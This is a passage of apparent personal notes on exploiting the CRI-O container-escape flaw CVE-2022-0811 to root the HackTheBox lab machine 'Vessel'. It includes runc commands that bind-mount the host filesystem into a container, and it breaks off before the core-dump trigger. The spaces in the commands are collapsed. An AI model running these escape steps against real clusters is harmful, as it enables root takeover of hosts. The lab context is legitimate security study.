CVE-2022-0811 is a vulnerability in CRI-O (a container runtime engine underpinning Kubernetes). Dubbed “cr8escape,” when invoked, an attacker could escape from a Kubernetes container and gain root access to the host and be able to move anywhere in the cluster. Invocation of CVE-2022-0811 can allow an attacker to perform a variety of actions on objectives, including execution of malware, exfiltration of data and lateral movement across pods.
Proof-of-Concept
My notes from using CVE-2022-0811 to pwn the machine 'Vessel' on HackTheBox.
Reading about the exploit we should (1) create a pod/container, (2) use pinns to exploit the vulnerable variable kernel.core_pattern, (3) trigger a core dump and then reap the rewards. More information here: CVE-2022-0811
Create a container using kubectl, minikube, docker or runc.
## Create location for runc filesystemethan@vessel:/$mkdir/tmp/pthreeethan@vessel:/$mkdir/tmp/pthree/rootfs## Create runc configurationethan@vessel:/tmp/pthree$runcspec--rootless## Add following data under 'mounts' section of config.json{"type":"bind","source":"/","destination":"/","options": ["rbind","rw","rprivate"]},## Start runcethan@vessel:/tmp/pthree$runcrunprivescroot@runc:/#hostnamerunc
Open a second terminal and write a simple PoC script to be executed
Verify that netns and utsns are created in /tmp/pthree from the container:
# ls -al /tmp/pthreetotal24drwxrwxr-x5rootroot4096Sep209:07.drwxrwxrwt17nobodynogroup4096Sep209:03..-rw-rw-r--1rootroot2893Sep208:59config.jsondrwxr-xr-x2nobodyroot4096Sep209:07netnsdrwxrwxr-x2rootroot4096Sep208:58rootfsdrwxr-xr-x2nobodyroot4096Sep209:07utsns
In the first terminal (runc container) trigger a core dump to run the script:
